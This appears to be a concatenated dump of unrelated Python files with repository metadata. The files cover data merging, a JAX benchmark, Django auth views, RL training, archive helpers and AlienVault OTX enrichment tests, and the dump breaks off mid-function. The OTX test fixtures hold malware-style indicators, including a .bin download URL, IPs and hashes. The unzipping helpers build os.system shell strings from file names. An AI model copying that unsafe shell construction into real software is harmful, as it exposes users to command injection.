tags: List[str]
def __init__(self: Foo):
byte_string: bytes = b'newline:\n also newline:\x0a'
text_string = u"Cyrillic Я is \u042f. Oops: \u042g"
self.make_sense(whatever=1)
def make_sense(self, whatever):
self.sense = whatever
x = len('abc')
print(f.__doc__)
| 2.828125
| 3
|
variant_remapping_tools/merge_yaml.py
|
diegomscoelho/variant-remapping
| 3
|
12780083
|
#! /usr/bin/env python3
import argparse
import yaml
def merge_two_dict(d1, d2):
result = {}
for key in set(d1) | set(d2):
if isinstance(d1.get(key), dict) or isinstance(d2.get(key), dict):
result[key] = merge_two_dict(d1.get(key, dict()), d2.get(key, dict()))
else:
result[key] = d1.get(key, 0) + d2.get(key, 0)
return result
def merge_yaml_files(input_yamls, output_yaml):
output = {}
for input_yaml in input_yamls:
with open(input_yaml) as open_input:
data = yaml.safe_load(open_input) or {}
output = merge_two_dict(output, data)
with open(output_yaml, 'w') as open_output:
yaml.safe_dump(output, open_output)
def main():
description = ('Merge multiple yaml file containing stats by summing the overlapping fields')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('--inputs', type=str, required=True, nargs='+',
help='YAML files containing the input summary metrics')
parser.add_argument('--output', type=str, required=True,
help='YAML files containing the output summary metrics')
args = parser.parse_args()
merge_yaml_files(args.inputs, args.output)
if __name__ == '__main__':
main()
| 3.078125
| 3
|
exceRNApipeline/tasks/task_count_exogenous_taxa.py
|
zhuchcn/exceRNAseq
| 1
|
12780084
|
<reponame>zhuchcn/exceRNAseq
from _exceRNApipeline_taxaCounter import taxaCounter
from exceRNApipeline.includes.utils import logger
import os
import argparse
from snakemake.shell import shell
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input-file", type=str)
parser.add_argument("-o", "--output-prefix", type=str)
parser.add_argument("-d", "--nodes-dmp", type=str)
parser.add_argument("-m", "--names-dmp", type=str)
return parser.parse_args()
def main():
args = parse_args()
if(not os.path.exists(args.input_file)):
raise argparse.ArgumentError(f"--input-file {args.input_file} does not exist.")
if(not os.path.exists(args.nodes_dmp)):
raise argparse.ArgumentError(f"--nodes-dmp {args.nodes_dmp} does not exist.")
if(not os.path.exists(args.names_dmp)):
raise argparse.ArgumentError(f"--names-dmp {args.names_dmp} does not exist.")
if(not os.path.isdir(os.path.dirname(args.output_prefix))):
msg = f"--output-prefix: you parsed the argument as {args.output_prefix}, " \
+ f"but the directory {os.path.dirname(args.output_prefix)} does not exist."
raise argparse.ArgumentError(msg)
taxaCounter(args.input_file, args.output_prefix, args.names_dmp, args.nodes_dmp)
if __name__ == '__main__':
main()
| 2.75
| 3
|
family/inheritance.py
|
jadry92/Python-course-platzi
| 0
|
12780085
|
<filename>family/inheritance.py
class Parent():
def __init__(self, last_name, eye_color):
print("Parent constructor called")
self.last_name = last_name
self.eye_color = eye_color
def show_info(self):
print("Last Name -"+self.last_name)
print("Eyes Color -"+self.eye_color)
class Child(Parent):
def __init__(self, last_name, eye_color, number_of_toys):
print("Child Constructor Called")
Parent.__init__(self, last_name, eye_color)
self.number_of_toys = number_of_toys
#papa = Parent("suarez","brown")
#print(papa.last_name)
yo = Child("suarez", "black", 2)
print(yo.number_of_toys)
yo.show_info()
| 3.8125
| 4
|
Drake-Z/0015/0015.py
|
saurabh896/python-1
| 3,976
|
12780086
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''第 0015 题: 纯文本文件 city.txt为城市信息, 里面的内容(包括花括号)如下所示:
{
"1" : "上海",
"2" : "北京",
"3" : "成都"
}
请将上述内容写到 city.xls 文件中。'''
__author__ = 'Drake-Z'
import json
from collections import OrderedDict
from openpyxl import Workbook
def txt_to_xlsx(filename):
file = open(filename, 'r', encoding = 'UTF-8')
file_cintent = json.load(file, encoding = 'UTF-8')
print(file_cintent)
workbook = Workbook()
worksheet = workbook.worksheets[0]
for i in range(1, len(file_cintent)+1):
worksheet.cell(row = i, column = 1).value = i
worksheet.cell(row = i, column = 2).value = file_cintent[str(i)]
workbook.save(filename = 'city.xls')
if __name__ == '__main__':
txt_to_xlsx('city.txt')
| 3.296875
| 3
|
jax/img_arap.py
|
BachiLi/autodiff_comp
| 2
|
12780087
|
import jax
import jax.numpy as np
import time
import skimage.io
num_iter = 10
key = jax.random.PRNGKey(1234)
Mask = np.array(skimage.io.imread('../data/Mask0.png')) > 0
Mask = np.reshape(Mask, [Mask.shape[0], Mask.shape[1], 1])
Offsets = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1], 2], dtype=np.float32)
Angle = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1]], dtype=np.float32)
Offsets_d = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1], 2], dtype=np.float32)
Angle_d = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1]], dtype=np.float32)
UrShape = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1], 2], dtype=np.float32)
Constraints = jax.random.uniform(key, shape=[Mask.shape[0], Mask.shape[1], 2], dtype=np.float32)
C_valid = np.ones(Mask.shape, dtype=Mask.dtype)
def f(Offsets, Angle):
Offsets_left = np.roll(Offsets, shift=-1, axis=0)
Offsets_right = np.roll(Offsets, shift=1, axis=0)
Offsets_up = np.roll(Offsets, shift=-1, axis=1)
Offsets_down = np.roll(Offsets, shift=1, axis=1)
UrShape_left = np.roll(UrShape, shift=-1, axis=0)
UrShape_right = np.roll(UrShape, shift=1, axis=0)
UrShape_up = np.roll(UrShape, shift=-1, axis=1)
UrShape_down = np.roll(UrShape, shift=1, axis=1)
Mask_left = np.roll(Mask, shift=-1, axis=0)
Mask_right = np.roll(Mask, shift=1, axis=0)
Mask_up = np.roll(Mask, shift=-1, axis=1)
Mask_down = np.roll(Mask, shift=1, axis=1)
d_off_left = Offsets - Offsets_left
d_off_right = Offsets - Offsets_right
d_off_up = Offsets - Offsets_up
d_off_down = Offsets - Offsets_down
d_ur_left = UrShape - UrShape_left
d_ur_right = UrShape - UrShape_right
d_ur_up = UrShape - UrShape_up
d_ur_down = UrShape - UrShape_down
cos_angle = np.cos(Angle)
sin_angle = np.sin(Angle)
Rot2D_left = np.stack(\
[cos_angle * d_ur_left[:, :, 0] - sin_angle * d_ur_left[:, :, 1],
sin_angle * d_ur_left[:, :, 0] - cos_angle * d_ur_left[:, :, 1]], -1)
Rot2D_right = np.stack(\
[cos_angle * d_ur_right[:, :, 0] - sin_angle * d_ur_right[:, :, 1],
sin_angle * d_ur_right[:, :, 0] - cos_angle * d_ur_right[:, :, 1]], -1)
Rot2D_up = np.stack(\
[cos_angle * d_ur_up[:, :, 0] - sin_angle * d_ur_up[:, :, 1],
sin_angle * d_ur_up[:, :, 0] - cos_angle * d_ur_up[:, :, 1]], -1)
Rot2D_down = np.stack(\
[cos_angle * d_ur_down[:, :, 0] - sin_angle * d_ur_down[:, :, 1],
sin_angle * d_ur_down[:, :, 0] - cos_angle * d_ur_down[:, :, 1]], -1)
d_diff_left = d_off_left - Rot2D_left
d_diff_right = d_off_right - Rot2D_right
d_diff_up = d_off_up - Rot2D_up
d_diff_down = d_off_down - Rot2D_down
reg_left = np.logical_and(Mask, Mask_left) * d_diff_left * d_diff_left
reg_right = np.logical_and(Mask, Mask_right) * d_diff_right * d_diff_right
reg_up = np.logical_and(Mask, Mask_up) * d_diff_up * d_diff_up
reg_down = np.logical_and(Mask, Mask_down) * d_diff_down * d_diff_down
E_fit = (Offsets - Constraints) * (Offsets - Constraints)
return np.stack([C_valid * 0.5 * E_fit,
0.5 * reg_left,
0.5 * reg_right,
0.5 * reg_up,
0.5 * reg_down], -1)
def JTJx(Offsets, Angle, Offsets_d, Angle_d):
_, Jx = jax.jvp(f, [Offsets, Angle], [Offsets_d, Angle_d])
_, f_vjp = jax.vjp(f, Offsets, Angle)
return f_vjp(Jx)
def JTFx(Offsets, Angle):
Fx, f_vjp = jax.vjp(f, Offsets, Angle)
return f_vjp(Fx)
jf = jax.jit(f)
jJTJx = jax.jit(JTJx)
jJTFx = jax.jit(JTFx)
# jf = f
# jJTJx = JTJx
# jJTFx = JTFx
min_fwd_time = 1e20
min_JTJ_time = 1e20
min_JTFx_time = 1e20
avg_fwd_time = 0
avg_JTJ_time = 0
avg_JTFx_time = 0
for i in range(num_iter + 1):
start = time.time()
y = jf(Offsets, Angle).block_until_ready()
int0 = time.time()
jtjx = jJTJx(Offsets, Angle, Offsets_d, Angle_d)
jtjx[0].block_until_ready()
jtjx[1].block_until_ready()
int1 = time.time()
jtfx = jJTFx(Offsets, Angle)
jtfx[0].block_until_ready()
jtfx[1].block_until_ready()
end = time.time()
if i > 0:
avg_fwd_time += int0 - start
avg_JTJ_time += int1 - int0
avg_JTFx_time += end - int1
if int0 - start < min_fwd_time:
min_fwd_time = int0 - start
if int1 - int0 < min_JTJ_time:
min_JTJ_time = int1 - int0
if end - int1 < min_JTFx_time:
min_JTFx_time = end - int1
print('Minimum forward time:', min_fwd_time)
print('Minimum JTJ time:', min_JTJ_time)
print('Minimum JTFx time:', min_JTFx_time)
print('Ratio minimum JTJ:', min_JTJ_time / min_fwd_time)
print('Ratio minimum JTFx:', min_JTFx_time / min_fwd_time)
print('Average forward time:', avg_fwd_time / num_iter)
print('Average JTJ time:', avg_JTJ_time / num_iter)
print('Average JTFx time:', avg_JTFx_time / num_iter)
print('Ratio average JTJ:', avg_JTJ_time / avg_fwd_time)
print('Ratio average JTFx:', avg_JTFx_time / avg_fwd_time)
| 1.875
| 2
|
gewittergefahr/gg_utils/unzipping.py
|
dopplerchase/GewitterGefahr
| 26
|
12780088
|
"""Methods for unzipping files."""
import os
from gewittergefahr.gg_utils import file_system_utils
from gewittergefahr.gg_utils import error_checking
def unzip_tar(tar_file_name, target_directory_name=None,
file_and_dir_names_to_unzip=None):
"""Unzips tar file.
:param tar_file_name: Path to input file.
:param target_directory_name: Path to output directory.
:param file_and_dir_names_to_unzip: List of files and directories to extract
from the tar file. Each list element should be a relative path inside
the tar file. After unzipping, the same relative path will exist inside
`target_directory_name`.
:raises: ValueError: if the Unix command fails.
"""
error_checking.assert_is_string(tar_file_name)
error_checking.assert_is_string_list(file_and_dir_names_to_unzip)
file_system_utils.mkdir_recursive_if_necessary(
directory_name=target_directory_name)
unix_command_string = 'tar -C "{0:s}" -xvf "{1:s}"'.format(
target_directory_name, tar_file_name)
for this_relative_path in file_and_dir_names_to_unzip:
unix_command_string += ' "' + this_relative_path + '"'
exit_code = os.system(unix_command_string)
if exit_code != 0:
raise ValueError('\nUnix command failed (log messages shown above '
'should explain why).')
def unzip_gzip(gzip_file_name, extracted_file_name):
"""Unzips gzip archive.
Keep in mind that all gzip archive contain only one file.
:param gzip_file_name: Path to gzip archive.
:param extracted_file_name: The one file in the gzip archive will be saved
here.
:raises: ValueError: if the Unix command fails.
"""
error_checking.assert_is_string(gzip_file_name)
file_system_utils.mkdir_recursive_if_necessary(
file_name=extracted_file_name)
unix_command_string = 'gunzip -v -c "{0:s}" > "{1:s}"'.format(
gzip_file_name, extracted_file_name)
exit_code = os.system(unix_command_string)
if exit_code != 0:
raise ValueError('\nUnix command failed (log messages shown above '
'should explain why).')
def gzip_file(input_file_name, output_file_name=None, delete_input_file=True):
"""Creates gzip archive with one file.
:param input_file_name: Path to input file (will be gzipped).
:param output_file_name: Path to output file (extension must be ".gz"). If
`output_file_name is None`, will simply append ".gz" to name of input
file.
:param delete_input_file: Boolean flag. If True, will delete input file
after gzipping.
:raises: ValueError: if `output_file_name` does not end with ".gz".
:raises: ValueError: if the Unix command fails.
"""
error_checking.assert_file_exists(input_file_name)
error_checking.assert_is_boolean(delete_input_file)
if output_file_name is None:
output_file_name = '{0:s}.gz'.format(input_file_name)
if not output_file_name.endswith('.gz'):
error_string = (
'Output file ("{0:s}") should have extension ".gz".'
).format(output_file_name)
raise ValueError(error_string)
unix_command_string = 'gzip -v -c "{0:s}" > "{1:s}"'.format(
input_file_name, output_file_name)
exit_code = os.system(unix_command_string)
if exit_code != 0:
raise ValueError('\nUnix command failed (log messages shown above '
'should explain why).')
if delete_input_file:
os.remove(input_file_name)
| 3.140625
| 3
|
terbilang.py
|
saih02/terbilang
| 1
|
12780089
|
<reponame>saih02/terbilang<gh_stars>1-10
def hasil(num):
huruf = ['nol', 'satu', 'dua', 'tiga', 'empat', 'lima', 'enam', 'tujuh', 'delapan', 'sembilan', 'sepuluh', 'sebelas']
if num < 12:
temp = ' '+huruf[num]
elif num < 20:
temp = str(hasil(num-10))+' belas'
elif num < 100:
temp = str(hasil(num//10))+' puluh'+str(hasil(num%10))
elif num < 200:
temp = ' seratus'+str(hasil(num-100))
elif num < 1000:
temp = str(hasil(num//100))+' ratus'+str(hasil(num%100))
elif num < 2000:
temp = ' seribu'+str(hasil(num-1000))
elif num < 1000000:
temp = str(hasil(num//1000))+' ribu'+str(hasil(num%1000))
elif num < 1000000000:
temp = str(hasil(num//1000000))+' juta'+str(hasil(num%1000000))
elif num < 1000000000000:
temp = str(hasil(num//1000000000))+' milyar'+str(hasil(num%1000000000))
elif num < 1000000000000000:
temp = str(hasil(num//1000000000000))+' trilyun'+str(hasil(num%1000000000000))
return temp
def terbilang(num):
if num < 0:
hasilV = 'minus '+hasil(num)
else:
hasilV = hasil(num)
return hasilV
| 3.40625
| 3
|
author/views.py
|
IanSeng/CMPUT404_PROJECT
| 0
|
12780090
|
from rest_framework import generics, authentication, permissions
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.exceptions import ValidationError, AuthenticationFailed
from rest_framework.authtoken.models import Token
from rest_framework.response import Response
from rest_framework import status
from django.contrib.auth import get_user_model
from django.shortcuts import get_object_or_404
from author.serializers import AuthorSerializer, AuthAuthorSerializer, AuthorProfileSerializer
class CreateAuthorView(generics.CreateAPIView):
"""Create a new author in the system"""
serializer_class = AuthorSerializer
class AuthAuthorView(ObtainAuthToken):
"""Authenticate author in the system"""
serializer_class = AuthAuthorSerializer
def post(self, request, *args, **kwargs):
serializer = self.serializer_class(data=request.data,
context={'request': request})
serializer.is_valid(raise_exception=True)
author = serializer.validated_data['user']
token, created = Token.objects.get_or_create(user=author)
if not author.adminApproval:
return Response({"error": ["User has not been approved by admin"]}, status=status.HTTP_401_UNAUTHORIZED)
return Response({
'token': token.key,
})
class AuthorProfileView(generics.RetrieveUpdateAPIView):
"""Get author in the system"""
serializer_class = AuthorProfileSerializer
authenticate_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
http_method_names = ["get", "put"]
def get_object(self):
id = self.kwargs['pk']
try:
return get_object_or_404(get_user_model().objects, id=id)
except:
raise ValidationError({"error": ["User not found"]})
class MyProfileView(generics.RetrieveAPIView):
"""Get authenticated author profile in the system"""
serializer_class = AuthorProfileSerializer
authenticate_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAuthenticated,)
http_method_names = ["get"]
def get_object(self):
if not self.request.user.adminApproval:
raise AuthenticationFailed(detail ={"error": ["User has not been approved by admin"]})
return self.request.user
| 2.140625
| 2
|
src/web/pager.py
|
dzca/net-audit
| 0
|
12780091
|
<gh_stars>0
#!/usr/bin/python
class Pager:
def __init__(self, size, count, page):
self.size = size
self.count = count
self.pages = self._init_pages()
self.page = page
def _init_pages(self):
pages = self.count/self.size
mod_of_pages = self.count%self.size
if mod_of_pages == 0:
return pages
else:
return pages + 1
@property
def current(self):
return self.page
@property
def pages(self):
return self.pages
@property
def previous(self):
if self.page > 1:
return self.page - 1
else:
return 0
@property
def next(self):
if self.page == self.pages:
return 0
else:
return self.page + 1
@property
def size(self):
return self.size
| 3.53125
| 4
|
100-Exercicios/ex017.py
|
thedennerdev/ExerciciosPython-Iniciante
| 0
|
12780092
|
#Faça um programa que leia o comprimento do cateto oposto e do cateto adjacente de um triângulo retângulo.
#Calcule e mostre o comprimento da hipotenusa.
"""co = float(input('Valor cateto oposto: '))
ca = float(input('valor cateto adjacente: '))
hi = (co ** 2 + ca ** 2) ** (1/2)
print('O valor da hipotenusa é {:.2f}'.format(hi))"""
'''import math
co = float(input('Informe o valor Cateto Oposto: '))
ca = float(input('Informe o valor Cateto Adjacente: '))
hi = math.hypot(co, ca)
print('O valor da hipotenusa é {:.2f}'.format(hi))'''
from math import hypot
co = float(input('Valor cateto oposto: '))
ca = float(input('Valor cateto adjacente: '))
hi = hypot(co, ca)
print('O valor da hipotenusa será {:.2f}'.format(hi))
| 4.03125
| 4
|
two_thinning/average_based/RL/basic_neuralnet_RL/train.py
|
varikakasandor/dissertation-balls-into-bins
| 0
|
12780093
|
import numpy as np
import torch
import torch.nn as nn
from two_thinning.average_based.RL.basic_neuralnet_RL.neural_network import AverageTwoThinningNet
n = 10
m = n
epsilon = 0.1
train_episodes = 3000
eval_runs = 300
patience = 20
print_progress = True
print_behaviour = False
def reward(x):
return -np.max(x)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def greedy(model, ball_number):
action_values = model(torch.DoubleTensor([ball_number]))
a = torch.argmax(action_values)
return a
def epsilon_greedy(model, ball_number, epsilon=epsilon):
action_values = model(torch.DoubleTensor([ball_number]))
r = torch.rand(1)
if r < epsilon:
a = torch.randint(len(action_values), (1,))[0]
else:
a = torch.argmax(action_values)
return a, action_values[a]
def evaluate_q_values(model, n=n, m=m, reward=reward, eval_runs=eval_runs, print_behaviour=print_behaviour):
with torch.no_grad():
sum_loads = 0
for _ in range(eval_runs):
loads = np.zeros(n)
for i in range(m):
a = greedy(model, i)
if print_behaviour:
print(f"With loads {loads} the trained model chose {a}")
randomly_selected = np.random.randint(n)
if loads[randomly_selected] <= a:
loads[randomly_selected] += 1
else:
loads[np.random.randint(n)] += 1
sum_loads += reward(loads)
avg_score = sum_loads / eval_runs
return avg_score
def train(n=n, m=m, epsilon=epsilon, reward=reward, episodes=train_episodes, eval_runs=eval_runs, patience=patience,
print_progress=print_progress, print_behaviour=print_behaviour, device=device):
curr_model = AverageTwoThinningNet(m, device)
best_model = AverageTwoThinningNet(m, device)
optimizer = torch.optim.Adam(curr_model.parameters())
mse_loss = nn.MSELoss()
best_eval_score = None
not_improved = 0
for ep in range(episodes):
loads = np.zeros(n)
for i in range(m):
a, old_val = epsilon_greedy(curr_model, i, epsilon)
randomly_selected = np.random.randint(n)
if loads[randomly_selected] <= a:
loads[randomly_selected] += 1
else:
loads[np.random.randint(n)] += 1
if i == m - 1:
new_val = torch.as_tensor(reward(loads)).to(device)
else:
_, new_val = epsilon_greedy(curr_model, i + 1, epsilon)
new_val = new_val.detach()
loss = mse_loss(old_val, new_val)
optimizer.zero_grad()
loss.backward()
optimizer.step()
curr_eval_score = evaluate_q_values(curr_model, n=n, m=m, reward=reward, eval_runs=eval_runs,
print_behaviour=print_behaviour)
if best_eval_score is None or curr_eval_score > best_eval_score:
best_eval_score = curr_eval_score
best_model.load_state_dict(curr_model.state_dict())
not_improved = 0
if print_progress:
print(f"At episode {ep} the best eval score has improved to {curr_eval_score}.")
elif not_improved < patience:
not_improved += 1
if print_progress:
print(f"At episode {ep} no improvement happened.")
else:
if print_progress:
print(f"Training has stopped after episode {ep} as the eval score didn't improve anymore.")
break
return best_model
if __name__ == "__main__":
train()
| 2.859375
| 3
|
echopype/tests/test_2in1_ek80_convert.py
|
Chuck-A/echopype
| 0
|
12780094
|
from pathlib import Path
from echopype.convert import Convert
def test_2in1_ek80_conversion():
file = Path("./echopype/test_data/ek80/Green2.Survey2.FM.short.slow.-D20191004-T211557.raw").resolve()
nc_path = file.parent.joinpath(file.stem+".nc")
tmp = Convert(str(file), model="EK80")
tmp.raw2nc()
del tmp
nc_path.unlink()
| 2.375
| 2
|
exercises/0389-FindTheDifference/find_the_difference_test.py
|
tqa236/leetcode-solutions
| 1
|
12780095
|
import random
import string
import unittest
from find_the_difference import Solution
from hypothesis import given
from hypothesis.strategies import text
class Test(unittest.TestCase):
def test_1(self):
solution = Solution()
self.assertEqual(solution.findTheDifference("abcd", "abcde"), "e")
@given(text())
def test_random(self, s):
solution = Solution()
random_letter = random.choice(string.ascii_letters)
t = list(s + random_letter)
random.shuffle(t)
t = "".join(t)
self.assertEqual(solution.findTheDifference(s, t), random_letter)
if __name__ == "__main__":
unittest.main()
| 3.5625
| 4
|
src/load_data.py
|
agalbachicar/swing_for_the_fences
| 0
|
12780096
|
import os
import logging
import json
import pandas as pd
def data_paths_from_periodicity(periodicity):
if periodicity == 'hourly':
return ['../datasets/bitstamp_data_hourly.csv']
elif periodicity == 'daily':
return ['../datasets/bitstamp_data_daily.csv']
return ['../datasets/bitstamp_data.csv.part1',
'../datasets/bitstamp_data.csv.part2',
'../datasets/bitstamp_data.csv.part3',
'../datasets/bitstamp_data.csv.part4',
'../datasets/bitstamp_data.csv.part5']
def load_btc_data(periodicity):
file_paths = data_paths_from_periodicity(periodicity)
# Función que permite convertir el formato de las fechas como unix time
# en un objeto de fecha.
def unix_time_to_date(x): return pd.to_datetime(x, unit='s')
li = []
for filename in file_paths:
df = pd.read_csv(filename, parse_dates=[
'Timestamp'], date_parser=unix_time_to_date, index_col='Timestamp')
li.append(df)
return pd.concat(li, axis=0)
def load_btc_csv(filepath):
# Función que permite convertir el formato de las fechas como unix time
# en un objeto de fecha.
def unix_time_to_date(x): return pd.to_datetime(x, unit='s')
return pd.read_csv(filepath, parse_dates=['Timestamp'], date_parser=unix_time_to_date, index_col='Timestamp')
def load_glassnode_json():
glassnode_json_directory = '../datasets/glassnode/json/'
df = pd.DataFrame()
for f in os.listdir(glassnode_json_directory):
if f.endswith('.json'):
col_name = f[:-len('.json')]
df0 = pd.read_json(os.path.join(glassnode_json_directory, f),
orient='records', precise_float=True,
convert_dates=['t'])
# Sets the index
df0.rename(columns={'t': 'Timestamp'}, inplace=True)
df0.set_index('Timestamp', inplace=True)
# Change column name
if 'v' in df0.columns:
df0.rename(columns={'v': col_name}, inplace=True)
else:
columns = df0['o'][0].keys()
# TODO: stock-to-flow.json requires a special treatment.
if 'ratio' in columns:
df0['ratio'] = df0['o'].apply(lambda x: x['ratio'])
df0['daysTillHalving'] = df0['o'].apply(
lambda x: x['daysTillHalving'])
else:
for c in columns:
df0[[c]] = df0['o'].map(lambda d: d[c])
df0.drop(['o'], axis=1, inplace=True)
# Merge it
if df.empty:
df = df0
else:
df = pd.merge(df, df0, how='inner', left_index=True,
right_index=True)
return df
def load_glassnode_csv():
return load_btc_csv('../datasets/glassnode/csv/dataset.csv')
def load_gtrends_csv():
# Correctly parses the date.
def date_to_pandas_datetime(x): return pd.to_datetime(x, format='%Y-%m-%d')
df = pd.read_csv('../datasets/google_trends/gtrends.csv', parse_dates=[
'Timestamp'], date_parser=date_to_pandas_datetime, index_col='Timestamp')
df.sort_index(inplace=True)
return df
def load_alternative_me_csv():
# Correctly parses the date.
def date_to_pandas_datetime(x): return pd.to_datetime(x, format='%d-%m-%Y')
df = pd.read_csv('../datasets/alternative_me/alternative_me.csv', parse_dates=[
'Timestamp'], date_parser=date_to_pandas_datetime, index_col='Timestamp')
# Convert SentimentClassification into a factor
df['SentimentClassificationFactor'], _ = pd.factorize(
df.SentimentClassification)
# Removes the used column
df.drop('SentimentClassification', inplace=True, axis=1)
df.sort_index(inplace=True)
return df
| 2.828125
| 3
|
code/tests/unit/api/test_enrich.py
|
CiscoSecurity/tr-05-serverless-alienvault-otx
| 1
|
12780097
|
from http import HTTPStatus
from random import sample
from unittest import mock
from urllib.parse import quote
from pytest import fixture
import jwt
from api.mappings import Sighting, Indicator, Relationship
from .utils import headers
def implemented_routes():
yield '/observe/observables'
yield '/refer/observables'
@fixture(scope='module',
params=implemented_routes(),
ids=lambda route: f'POST {route}')
def implemented_route(request):
return request.param
@fixture(scope='module')
def invalid_json():
return [{'type': 'unknown', 'value': ''}]
def test_enrich_call_with_invalid_json_failure(implemented_route,
client,
invalid_json):
response = client.post(implemented_route, json=invalid_json)
# The actual error message is quite unwieldy, so let's just ignore it.
expected_payload = {
'errors': [
{
'code': 'invalid payload received',
'message': mock.ANY,
'type': 'fatal',
}
]
}
assert response.status_code == HTTPStatus.OK
assert response.get_json() == expected_payload
def avotx_api_routes():
yield '/observe/observables'
@fixture(scope='module',
params=avotx_api_routes(),
ids=lambda route: f'POST {route}')
def avotx_api_route(request):
return request.param
def all_routes():
yield '/deliberate/observables'
yield '/observe/observables'
yield '/refer/observables'
@fixture(scope='module',
params=all_routes(),
ids=lambda route: f'POST {route}')
def any_route(request):
return request.param
def avotx_api_response(status_code):
mock_response = mock.MagicMock()
mock_response.status_code = status_code
if status_code == HTTPStatus.OK:
indicator_types = [
'domain',
'FileHash-MD5',
'FileHash-SHA1',
'FileHash-SHA256',
'IPv4',
'IPv6',
'URL',
]
pulse = {
'author': {
'username': 'JoriQ',
},
'description': (
'This is simply the best pulse in the history of humankind!'
),
'id': 'q1w2e3r4t5y6',
'indicator_type_counts': {
indicator_type: 1
for indicator_type in indicator_types
},
'name': 'Best Pulse Ever',
'tags': ['open', 'threat', 'exchange'],
'TLP': 'white',
}
indicators = [
{
'indicator': 'jsebnawkndwandawd.sh',
'created': '1970-01-01T00:00:00',
'expiration': None,
},
{
'indicator': 'd8414d743778cae103c15461200ec64d',
'created': '1970-01-02T00:00:00',
'expiration': None,
},
{
'indicator': '4f79d1a01b9b5cb3cb65a9911db2a02ea3bb7c45',
'created': '1970-01-03T00:00:00',
'expiration': None,
},
{
'indicator': 'efdd3ee0f816eba8ab1cba3643e42b40aaa16654d5120c67169d1b002e7f714d', # noqa: E501
'created': '1970-01-04T00:00:00',
'expiration': None,
},
{
'indicator': '172.16.58.3',
'created': '1970-01-05T00:00:00',
'expiration': '1970-01-06T00:00:00',
},
{
'indicator': '2001:14ba:1f00:0:1117:e76e:843d:f803',
'created': '1970-01-06T00:00:00',
'expiration': '1970-01-07T00:00:00',
},
{
'indicator': 'http://blockchains.pk/nw_NIHbAj35.bin',
'created': '1970-01-07T00:00:00',
'expiration': None,
},
]
for indicator in indicators:
indicator['pulse_key'] = pulse['id']
payload_list = []
for indicator_type in indicator_types:
payload_list.append({
'base_indicator': {
'type': indicator_type,
},
'pulse_info': {
'pulses': [pulse],
},
})
payload_list.append({
'next': None,
'results': indicators,
})
payload_list_iter = iter(payload_list)
mock_response.json = lambda: next(payload_list_iter)
return mock_response
@fixture(scope='module')
def expected_payload(any_route, client, valid_json):
app = client.application
payload = None
if any_route.startswith('/deliberate'):
payload = {}
if any_route.startswith('/observe'):
observable_types = {
'domain',
'md5',
'sha1',
'sha256',
'ip',
'ipv6',
'url',
}
observables = [
observable
for observable in valid_json
if observable['type'] in observable_types
]
count = len(observables)
start_times = [
f'1970-01-0{day}T00:00:00Z'
for day in range(1, count + 1)
]
observed_times = [
{'start_time': start_time}
for start_time in start_times
]
for observed_time in observed_times:
observed_time['end_time'] = observed_time['start_time']
valid_times = [
{'start_time': start_time}
for start_time in start_times
]
for index in range(count):
if observables[index]['type'] in ('ip', 'ipv6'):
day = index + 1
valid_times[index]['end_time'] = (
f'1970-01-0{day + 1}T00:00:00Z'
)
description = (
'This is simply the best pulse in the history of humankind!'
)
external_ids = ['q1w2e3r4t5y6']
producer = 'JoriQ'
short_description = description
source_uri = (
f"{app.config['AVOTX_URL'].rstrip('/')}/pulse/{external_ids[0]}"
)
tags = ['open', 'threat', 'exchange']
title = 'Best Pulse Ever'
tlp = 'white'
# Implement a dummy class initializing its instances
# only after the first comparison with any other object.
class LazyEqualizer:
NONE = object()
def __init__(self):
self.value = self.NONE
def __eq__(self, other):
if self.value is self.NONE:
self.value = other
return self.value == other
sighting_refs = [LazyEqualizer() for _ in range(count)]
indicator_refs = [LazyEqualizer() for _ in range(count)]
payload = {
'sightings': {
'count': count,
'docs': [
{
'description': description,
'external_ids': external_ids,
'id': sighting_ref,
'observables': [observable],
'observed_time': observed_time,
'source_uri': source_uri,
'title': title,
'tlp': tlp,
**Sighting.DEFAULTS
}
for sighting_ref, observable, observed_time
in zip(sighting_refs, observables, observed_times)
],
},
'indicators': {
'count': count,
'docs': [
{
'id': indicator_ref,
'external_ids': external_ids,
'producer': producer,
'short_description': short_description,
'source_uri': source_uri,
'tags': tags,
'title': title,
'tlp': tlp,
'valid_time': valid_time,
**Indicator.DEFAULTS
}
for indicator_ref, observable, valid_time
in zip(indicator_refs, observables, valid_times)
],
},
'relationships': {
'count': count,
'docs': [
{
'id': mock.ANY,
'source_ref': sighting_ref,
'target_ref': indicator_ref,
**Relationship.DEFAULTS
}
for sighting_ref, indicator_ref
in zip(sighting_refs, indicator_refs)
],
},
}
if any_route.startswith('/refer'):
observable_types = {
'domain': {'name': 'domain', 'category': 'domain'},
'email': {'name': 'email', 'category': 'email'},
'md5': {'name': 'MD5', 'category': 'file'},
'sha1': {'name': 'SHA1', 'category': 'file'},
'sha256': {'name': 'SHA256', 'category': 'file'},
'ip': {'name': 'IP', 'category': 'ip'},
'ipv6': {'name': 'IPv6', 'category': 'ip'},
'url': {'name': 'URL', 'category': 'url'},
}
payload = []
for observable in valid_json:
if observable['type'] not in observable_types:
continue
observable = {**observable, **observable_types[observable['type']]}
reference = {
'id': (
f"ref-avotx-search-{observable['type']}-"
f"{quote(observable['value'], safe='')}"
),
'title': f"Search for this {observable['name']}",
'description': (
f"Lookup this {observable['name']} on AlienVault OTX"
),
'url': (
f"{app.config['AVOTX_URL']}/indicator/"
f"{observable['category']}/"
f"{quote(observable['value'], safe='@:')}"
),
'categories': ['Search', 'AlienVault OTX'],
}
payload.append(reference)
assert payload is not None, f'Unknown route: {any_route}.'
return {'data': payload}
def test_enrich_call_success(any_route,
client,
valid_json,
mock_request,
valid_jwt,
expected_payload,
get_public_key):
app = client.application
response = None
if any_route.startswith('/deliberate'):
response = client.post(any_route)
if any_route.startswith('/observe'):
target = 'api.observables.ThreadPoolExecutor.map'
side_effect = map
